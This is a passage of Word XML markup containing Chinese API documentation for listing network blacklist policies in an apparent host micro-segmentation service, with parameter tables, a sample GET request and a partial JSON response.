          <w:p w14:paraId="4B79F041" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2002BF70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2476ECA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016188A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56D4AF33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241ECBEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C81DFE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D77AE32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63628D54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="329DF4F4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38520FA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>switchStatuses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2EF7CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E51232" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F7CDC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FD8146C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70CB0E2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38EBD6E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A9F1309" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53AA1AEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="371696AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F9445A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56411060" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TimeRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="191E249E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="346F90E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EE8FFAC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="789F63DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>displayPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C6AFD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02537DBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="580B2721" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A694484" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA53C6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0C24B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E9A21A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EFC9191" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="789D0076" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53763173" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7853FD23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49232B4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65408E39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00B1AE81" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A27B451" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203D4E3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AEF2039" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B40F09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B80436F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TimeRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>字段：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="645"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="164AB31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2A7D87C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C28E636" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0814854E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B9E4306" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC54435" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD690B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E7A0F00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始时间,例如：2022-06-01 15:47:52</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="578D55E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117E16B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D3A6D02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3574A93D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6424BF4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CBE501" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/black-strategy/list?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D571D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3E833" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"rows": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "629db182b4064413ce8b08bf",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strategyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "新建黑名单-20220606154903",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstGroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "未分组主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"description": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部标签",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstIpRanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstAgentSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstAgentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstIpName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcGroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "未分组主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"description": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
